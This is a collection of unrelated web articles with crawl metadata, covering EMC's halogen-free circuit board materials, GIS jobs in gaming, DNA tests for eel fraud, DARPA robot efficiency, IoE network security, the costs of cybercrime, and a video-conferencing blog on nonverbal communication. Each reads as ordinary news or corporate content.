To eliminate environmentally sensitive materials in our products, viable alternatives must be found. When we believe that a material may be of concern, we take a precautionary approach by exploring alternatives that are safer for ecological and human health. We prioritize the substances to assess, and then collaborate across the industry and academia to identify and qualify alternatives that meet the same or higher standards of reliability, cost-effectiveness, performance, and availability as the materials we currently use. We implement substitutes in new designs where feasible.
Flame retardants in IT products are essential for product functionality and human safety. Halogens are an ingredient in flame retardants commonly used in laminates for printed circuit boards (PCBs), but there are concerns about halogens’ impact on the environment and human health. EMC has been working for several years to identify halogen-free substitutes that meet the rigorous technical requirements for our products.
In 2011, EMC successfully shifted the majority of its new PCBs to a halogen-free material. However, that halogen-free substitute could not be used in our high-performance PCBs, which have more stringent requirements. Because a suitable halogen-free substitute did not exist on the market, EMC decided to develop a solution.
In the spring of 2012, EMC invited chemists and engineers from a PCB manufacturer and a laminate supplier to work with EMC on this challenge. EMC set the vision to identify, test, and implement a new flame retardant that is halogen-free, meets the technical requirements of our high-performance PCBs, and is affordable to implement. EMC’s own experts in PCB design, signal integrity, and electrical and mechanical engineering participated in the project.
By the end of 2012, this collaborative group identified a halogen-free material that meets EMC’s requirements and will be implemented on our high-performance PCBs in 2013.
Originally, EMC was the only customer for these halogen-free substitutes. Today, our suppliers report that there is significant interest from other companies. By driving this effort with our suppliers to identify these substitutes, EMC is not only helping our own business, but also the rest of the industry and the planet’s ecosystem.
EMC participates in the U.S. Environmental Protection Agency (EPA) Partnership on Alternatives to Certain Phthalates, a project of their Design for Environment Program. This project has identified eight phthalates of high concern and a list of potential alternatives. We are currently working with our suppliers to evaluate these and other alternatives for use in our products. We are also members of the Green Chemistry and Commerce Council (GC3), which is conducting tests of alternative materials to determine human toxicity. In 2013, we intend to identify substitutes for those eight phthalates identified by the EPA, with the intent to implement changes in 2014.
FULL MATERIAL DISCLOSURE
EMC’s Full Material Disclosure (FMD) database catalogs the substances used in EMC products. This database enables us to quickly and easily identify the presence of substances—when there are new regulations regarding their use—and to respond more rapidly to those requirements. It also helps with identifying where “conflict minerals” (tin, tantalum, tungsten, and gold) are used in our products so that we can trace their source. To gather this information, we ask suppliers to identify materials used in every part of EMC products by CAS number (a unique identifier for chemical substances).
Compiling this database is complex due to the vast number of parts in our hardware products, the constant evolution of our product portfolio, and the maturity level of each supplier’s ability to report FMD. We continue to gather this information from our suppliers, adding data for our new products and backfilling data from our older product releases.
MEETING COMPLIANCE AND CUSTOMER REQUIREMENTS
As interest in reducing the environmental impact of IT products has grown, regulations on product material content worldwide have followed. There has also been an increase in requests for information from our customers about specific substances in our products. The initiatives mentioned above are critical to our efforts to stay ahead of government regulations and customer desires, but the proliferation of regulations and the lack of global harmonization can be a challenge. EMC has a governance body that oversees environmental product compliance and regularly anticipates and communicates requirements to our engineering organization and supply chain. In 2013, we plan to further educate our suppliers to help them understand and prepare for the quickly changing regulatory landscape. | <urn:uuid:5cf12e1e-6858-42cf-8b87-7f0863fd95e6> | CC-MAIN-2017-09 | https://www.emc.com/corporate/sustainability/sustaining-ecosystems/material-content.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.920082 | 1,113 | 3.078125 | 3 |
Geographic information systems professionals have been seeing an increase in career opportunities lately -- from working for specifically map-based enterprises such as Esri’s CityEngine and Google Earth to helping the public sector with its geospatial needs.
But now, a new avenue has opened up in the world of GIS: video games. Many games have begun to feature complex interactive maps, as seen in Grand Theft Auto V, which has blown away gamers with its attention to detail, and Call of Duty: Ghosts, where multiplayer maps play an important role. Other games such as SimCity allow you to build your own world.
"Whether it is introducing an improved user experience for games or creating more dynamic public spaces for our citizens to enjoy, there are so many ways in which GIS data can be leveraged to improve the world,” Stephen McElroy, GIS program chair at American Sentinel University, said in a statement. “3-D environments that simulate the real world help us to understand and plan sustainable environments."
If you're a GIS professional looking for a job, gaming is one route to consider. | <urn:uuid:333db765-1ff7-4b3a-96d0-5971f1606dc1> | CC-MAIN-2017-09 | http://www.nextgov.com/cio-briefing/wired-workplace/2014/08/mapping-out-video-games/91793/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00522-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949258 | 229 | 2.515625 | 3 |
A science institute in central Japan says it has devised a system to stop eel fraud using cheap DNA testing, as the summer surge in the foodstuff's popularity approaches amid a scarce local catch.
Eel caught locally is much more expensive than imports, due to trade restrictions and the declining numbers available on the market, and in recent years fraud has become a issue. Consumers are rarely able to tell the difference, but advances in DNA testing, which put most of the key technology on a single chip, have made such tests faster and more affordable.
Current DNA sequencing chips incorporate existing technologies such as CMOS sensors, based on the same technology as digital cameras, and prices for sequencing are falling. The cost of sequencing a human-sized genome has fallen into the thousands of dollars since the Human Genome Project was completed in 2003 at a cost of billions.
The slender, snaky fish are often served "kabayaki" style during the summer, cooked in thin slices with a sweet sauce. The traditional dish is thought to help avoid fatigue associated with Japan's hot, humid summer climate, and every year demand surges, increasing the chance of fraud.
"In the past tests had to check each eel individually, which costs 20,000 to 30,000 yen," said Toshihiro Tsuneyoshi, a professor and eel specialist at Shizuoka Institute of Science and Technology, where the test was developed. "This system can drive costs down to 20 or 30 yen per eel."
The Shizuoka Institute of Science and Technology said it can simultaneously test small tissue samples from thousands of eels, greatly reducing the cost and time required for testing. If a non-local eel is found in a batch, more tests will be performed to find the guilty foreigner, but as such cases are currently rare costs should remain low, Tsuneyoshi said. The university used testing equipment from California-based Life Technologies.
He said a similar system can also be used for other pricey foods where consumers can be easily duped, such as pricier cuts of tuna.
For now, concerned connoisseurs will have to rely on tests done by government inspectors, but DNA sequencing capabilities are already starting to appear in pocket-sized devices for other applications. | <urn:uuid:7980a100-62d2-44e7-bd39-1085af50fa50> | CC-MAIN-2017-09 | http://www.cio.com/article/2397928/fraud/japanese-university-to-battle-eel-fraud-with-cheap--rapid-dna-testing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00046-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961584 | 461 | 3.109375 | 3 |
The Department of Defense is asking for help in building more energy-efficient robots.
The government's Defense Advanced Research Projects Agency (DARPA) has issued a notice looking for research proposals for its Maximum Mobility and Manipulation (M3) project, a program that launched last year. Through the M3 program, Defense Department officials are looking to improve all aspects of robot creation and operations, from creating better manufacturing processors to enhanced performance to better controls and greater mobility.
Within this program is the M3 Actuation effort, where DARPA officials want to see a 2,000 percent improvement in the efficiency of power transmission and use in robots, with the eventual goal of enhancing what the robots can do.
The Defense Department sees a broad range of applications for robots, from machines that drive into an industrial disaster area and shut off valves leaking toxic steam to robots that can disarm roadside bombs to a robot that can carry hundreds of pounds of equipment over rocky terrain. The problem, according to DARPA, is that robots now are very inefficient, so they can't be used in such situations.
"Humans and animals have evolved to consume energy very efficiently," DARPA officials said in a July 3 statement. "Bones, muscles and tendons work together for propulsion using as little energy as possible. If robotic actuation can be made to approach the efficiency of human and animal actuation, the range of practical robotic applications will greatly increase and robot design will be less limited by power plant considerations."
DARPA officials are hoping that with outside help, they can greatly improve on the efficiency of robots. They figure it will take input from people and organizations from an array of scientific and engineering specialties, from low-loss power modulation and high-bandwidth variable impedance matching to gravitational load cancellation and high-efficiency power transmission between joints.
The M3 Actuation program will run on two tracks, according to DARPA. The first will aim to develop high-efficiency actuation technology that will enable robots similar to those being developed in the DARPA Robotics Challenge (DRC) platform to have 20 times more endurance than those actually in the DRC program when running untethered to a power source. Currently those robots have about 10 to 20 minutes of use.
The second track will be to work at improving the efficiency of robots that are both larger and smaller than those in the DRC program.
The M3 Actuation program will run in parallel with the DRC. Unlike the first track, the second track is more theoretical. Participants in both tracks will share their design approaches at the first DRC live competition scheduled for December 2013. Robots from the first track will be demonstrated though not compete at the second DRC competition in December 2014, according to DARPA officials. | <urn:uuid:d86e9a5a-6ac2-42cc-a724-5a0d11a608fd> | CC-MAIN-2017-09 | http://www.cioinsight.com/it-management/innovation/darpa-seeks-to-create-more-efficient-robots | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00046-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946229 | 560 | 3.234375 | 3 |
This vendor-written tech primer has been edited by Network World to eliminate product promotion, but readers should note it will likely favor the submitter’s approach.
The Internet of Everything’s (IoE) promise to create a more connected and transformed world comes closer to reality on a daily basis. Cisco predicts that 50 billion devices will be connected by the year 2020. But as devices bridge the physical and digital worlds, security challenges arise.
The ultimate goal of IoE is to increase operational efficiency, power new business models and improve quality of life. As IoE becomes a reality, organizations will bring more and more devices from disparate suppliers into their network. Cybersecurity models need to radically change to provide the right level of protection for this new, connected world.
The number and diversity of connected devices and associated applications is so large and growing so fast, that the very foundation of many of our cybersecurity assumptions is being challenged. It is therefore imperative that security models change to integrate broad-based network visibility and big data collection that can be leveraged through correlation and context and dynamically applied controls. In essence, making the network a giant sensor. This gives the depth of visibility needed to take informed security action and protect against all attack vectors.
New threat models in the connected world
The most compelling argument for making the network a giant sensor are the potential threat models that exist. For example, imagine an office with power switches that associate to wireless access points. An attacker sitting in the parking lot could potentially control all of the electrical outlets associated with those wireless access points. The attacker could turn off the lights or power down HVAC systems. Now imagine such an event happening in a hospital operating room during surgery. It’s about more than just theft or service disruption.
There is an increased attack surface with billions of new devices connected with IoE. And there is now also considerable threat diversity due to the variety of objects and new ways they interact, which adversaries can target.
The Internet of Everything will inevitably involve a great number of endpoints with not only poor security posture, but also poorly written protocol implementations from OSI Layers 2 through 7. These low margin commodity devices will contain minimal features and use the lowest cost hardware and software. As attacks against newer wireless technologies such as Bluetooth and Near Field Communication increase, we can see what is on the horizon for early implementations of IoE.
Thus, the Internet of Everything generates an evolving threat model. Malicious actors are quite creative in coming up with new and unexpected ways to exploit systems and cause damage. It is more important than ever to build additional security capabilities into the network.
Adapting to today’s threat environment
Just as criminal adversaries and threats constantly adapt and evolve, the same is true for security organizations responsible for countering these threats.
By taking a threat-centric, “network as a sensor” approach, IT security teams can leverage mobile, cloud and IoE endpoints in new ways to increase transparency and build actionable information.
The right model for IoE security will enable organizations to enjoy the benefits of IoE while maintaining a high level of data privacy and protection and ensuring reliable, uninterrupted service delivery. The model consists of three pillars that connect with one another—visibility, threat awareness, and action.
With visibility, we have a real-time, accurate picture of devices, data, and the relationships between them, scaling our ability to make sense of billions of devices, applications, and their associated information. This requires true automation and analytics; humans won’t be able to scale with the environment.
Threat awareness works with the amorphous perimeter, presuming compromise and honing our ability to identify threats based on understanding normal and abnormal behavior, identify indicators of compromise, make decisions, and respond rapidly. This requires overcoming complexity and fragmentation in our environments. Once we identify a threat or anomalous behavior we need to take action. This requires the right technologies, processes and people working together—and swiftly—to be effective.
Moving towards fully predictive infrastructure that changes in anticipation of potential threats isn’t easy, but it’s necessary. To do so, security teams need to get creative. Currently, it’s too expensive and too unwieldy to monitor every single east-west network connection. Security teams are dependent, therefore, on devices that emit data that can be consumed by another device. The goal is to embed security visibility and control into as many devices under IT’s control as possible and combine this with current network policies, making the network a vast, extensible sensor.
Clearing the Fog
Fog computing models describe one way to address this IoE scale problem. The “fog computing” term comes from the meteorological effect of fog as a layer between the ground (IoE sensors) and clouds (cloud computing). This model addresses the IoE scale problem by inserting a gateway between a set of IoE sensors and the data center that gathers data from multiple devices. It then performs initial filtering and correlation before sending higher-order data to the cloud. This fog layer could analyze and correlate events across multiple IoE sensors and identify vulnerabilities. It could then mitigate by ignoring the compromised device and instructing the neighboring sensors to do the same.
As IoE devices proliferate and the processing power of network switches and routers increases, the industry will eventually move to fog computing in the network in order to scale. While the majority of organizations have critical controls available, they lack the visibility and intelligence needed to update them. The market is shifting to incorporate higher levels of intelligence in the infrastructure, and the ultimate goal is to achieve an environment that is fully predictive and able to use machine-learning algorithms to improve efficiency and security. While security will never be fully automated, moving toward fog computing can result in broad visibility that helps preempt threats with cloud- and network-based intelligence.
In light of security threats that have already occurred during the first blush of the era of IoE – as well as those that have yet to be realized – organizations must consider how they will defend their data and their customers. Enterprises are seeking ways to access the local and global intelligence they need and combine this information with the right context for making informed decisions and taking action. To do so, they should focus on what is still within their control – network-connected devices – and use them as sensors. A threat-centric “network as a sensor” approach can therefore be used to capture data that highlights methods by which the malicious actor—external or internal—is achieving his or her goals. IT security teams can then more quickly detect and mitigate threats.
This story, "Security for the Internet of Everything: Turning the network Into a giant sensor" was originally published by Network World. | <urn:uuid:3b386ee1-b876-4475-9c5d-59adccdf3f2c> | CC-MAIN-2017-09 | http://www.itnews.com/article/2913595/internet-of-things/security-for-the-internet-of-everything-turning-the-network-into-a-giant-sensor.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00046-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940011 | 1,383 | 2.609375 | 3 |
Improving the ability of law enforcement agencies to catch cybercriminals should be a priority when governments decide how their cybersecurity budgets get spent, according to University of Cambridge security engineering professor Ross Anderson.
Anderson is one of seven computer researchers from the U.K., Germany, the Netherlands and the U.S. who recently performed an analysis of the costs of cybercrime at the request of the U.K. Ministry of Defence. Their findings were published in a research paper that will be presented on June 26 at the 11th Annual Workshop on the Economics of Information Security in Berlin.
The researchers split the costs of computer crimes into direct losses, indirect losses and costs associated with defending against those crimes in the future.
The defense costs stem from acquiring cybersecurity software like antivirus and firewall programs, offering fraud prevention services to consumers, implementing fraud detection systems and performing law enforcement investigations.
The study found that for more traditional crimes like tax and welfare fraud, which are increasingly performed with the help of computers, the defense costs are much lower than the amounts being stolen, which makes sense from an investment perspective.
However, for Internet-based crimes like hacking, denial of service attacks, online scams, phishing, spam and others, the defense costs are many times higher than the actual losses.
Anderson gave the example of a cybercriminal gang that ran a botnet responsible for a third of the world's spam traffic in 2010. It's estimated that this gang made less than US$3 million from their spam operation and yet, the worldwide cost of stopping spam was estimated at around $1 billion, he said.
There are multiple reasons for this discrepancy, but one of them has to do with the lack of law enforcement action against cybercriminals, the researchers said in their paper. "The straightforward conclusion to draw on the basis of the comparative figures collected in this study is that we should perhaps spend less in anticipation of computer crime (on antivirus, firewalls etc.) but we should certainly spend an awful lot more on catching and punishing the perpetrators."
"A lot of Internet crimes are perpetrated by only a small number of gangs," Anderson said. Current methods of dealing with cybercrime are inefficient, Anderson said, adding, "I think it's because many policemen think it's too hard."
The fact that many of these gangs are located in countries where cybercrime legislation is lacking or not strongly enforced should not necessarily be an impediment for law enforcement action, Anderson said. "There have been some gangs from Russia and the Ukraine who have been arrested after pressure from the British government."
"The problem at the moment is that there seems to be a very low priority for police cooperation," Anderson said. "If the governments of Britain, Germany, France, the U.S. and so on, were to make it a higher priority then the government of Russia would start to crack down on these gangs."
Western governments can also fight cybercrime by pressuring credit card companies like Visa and MasterCard into banning banks that process payments for cybercriminals, from their systems, Anderson said. "For example, almost all payments for fake Viagra go through only three banks."
The U.S. government has already demonstrated its ability to do this in 2010 when it pressured Visa and MasterCard into blocking credit card donations for WikiLeaks, the researcher said. "In the same way the banking system can be pressured into stopping processing payments for criminals."
There are particular types of cybercriminals that law enforcement agencies should aggressively target; for example, the people who write hacking tools and malware, Anderson said. In the future, law enforcement should be the priority when governments allocate more money to cybersecurity, he said.
Last year, the U.K. government allocated an extra APS640 million (US$1 billion) to cybersecurity, but they gave around APS400 million of this money to the U.K. Government Communications Headquarters (GCHQ), which is a technical surveillance agency, and only about APS15 million to the police, Anderson said.
"This is a bad outcome," he said. "The police should have gotten many tens of millions of pounds so they could improve forensics, improve enforcement and improve their technological capabilities in general." | <urn:uuid:3f00298c-4a73-4b9c-a843-2eb7cc157174> | CC-MAIN-2017-09 | http://www.cio.com/article/2394939/cybercrime/governments-should-invest-more-in-catching-cybercriminals--researchers-say.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00166-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967794 | 858 | 2.71875 | 3 |
In 1967, the Journal of Consulting Psychology published a study conducted by two researchers that would eventually shape the way we understand the importance of nonverbal communication. Written by UCLA professor Albert Mehrabian and Susan R. Ferris, the piece described the relative importance of words, tone of voice and body language in understanding an underlying emotional message. But more on this in a minute. First, we need to understand what nonverbal communication is.
As the name implies, nonverbal communication accounts for practically everything that isn’t the words used in communication. Eye contact, gestures, inflection, dress and proximity all play important but subtle roles in determining our understanding of a person’s meaning. Without these indicators, the totality of a person’s statement is impossible to interpret. Dr. Mehrabian suspected precisely that when he began conducting his experiments in the mid-1960s. In one, subjects were given three recordings of the word “maybe” – one to convey disfavor, one to convey favor and one to convey neutrality. They were then shown photos of female faces expressing the same three emotions and were told to determine the emotions of both the recordings and the photos. The subjects more accurately guessed the emotion conveyed in the photos by a margin of 3:2.
In a second study, Dr. Mehrabian’s subjects listened to recordings of nine words. Three were designed to convey affinity (“honey,” “thanks” and “dear”), three were meant to convey neutrality (“oh,” “really” and “maybe”) and three conveyed dislike (“don’t,” “terrible” and “brute”). The recordings were of speakers reading each word three times, each with a different tone: positive, neutral and negative. The result? A subject’s response to each word was dependent more on the inflection of the voice than the connotation of the word itself. These studies led Dr. Mehrabian to devise a formula to describe how the mind determines meaning. He concluded that the interpretation of a message is 7 percent verbal, 38 percent vocal and 55 percent visual. The conclusion was that 93 percent of communication is “nonverbal” in nature.
The implications on business communication are clear since so much of sales, marketing and management come down to effective communication. Companies that conduct business primarily by phone are leaving 55 percent of their message open to misinterpretation, while companies that run on email are leaving a staggering 93 percent on the table. Imagine the money that’s being thrown away because of inefficiency and miscommunication.
Video conferencing ensures that no inflection is missed or gesture left misinterpreted, because it engages all three aspects of communication in the same format. It puts you totally in control of shaping your message and effectively communicating it to clients, colleagues and business partners, eliminating virtually all room for miscommunication. At the end of the day, can you afford to leave 93 percent of your company’s message to chance? | <urn:uuid:69e95b78-daf7-40f1-8b88-d2e4e163f9f5> | CC-MAIN-2017-09 | http://www.lifesize.com/video-conferencing-blog/speaking-without-words/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00166-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94708 | 640 | 3.4375 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.